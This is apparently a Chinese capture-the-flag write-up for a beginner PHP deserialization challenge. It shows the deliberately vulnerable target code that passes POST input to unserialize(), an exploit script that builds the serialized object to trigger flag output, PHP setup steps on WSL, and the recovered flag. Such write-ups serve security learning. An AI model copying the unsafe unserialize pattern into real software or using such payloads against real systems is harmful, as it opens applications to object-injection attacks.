1 通过post参数提交反序列信息
2 题目
http://192.168.1.8/fxl1/fxl1.php
<?php
highlight_file(__FILE__);
class ezUnserialize{
public $key;
public function __destruct()
{
if($this->key == "FLAG"){
include('flag.php');
echo $flag;
}
}
}
unserialize($_POST['a']);
?>
3 EXP
<?php
<?php
class ezUnserialize{
public $key;
public function __construct($a)
{
$this->key = $a;
}
}
$obj = new ezUnserialize("FLAG");
echo serialize($obj);
?>
4 解题过程
4.0.1 在wsl的ubuntu上安装php环境
Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:
sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:
autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:
sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:
# Disable old PHP module (if any)
sudo a2dismod php7.0 # or whatever version you had before
# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2
4.0.2 /var/www/html配置普通账户可读可写可执行权限
(base) gpu3090@DESKTOP-8IU6393:~$ chown gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成 anaconda3 cookies.txt downloads snap summaries tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$
4.0.3 将题目代码和flag存放到/var/www/html/相应的位置
4.1 在vscode上运行上面的exp的php脚本
需要安装插件php debug 和php Server
4.2 vscode运行exp 的php脚本
4.3 通过hackbar的post功能提交
4.得到flag
flag{EzUns3ri4liZe_1s_g00d}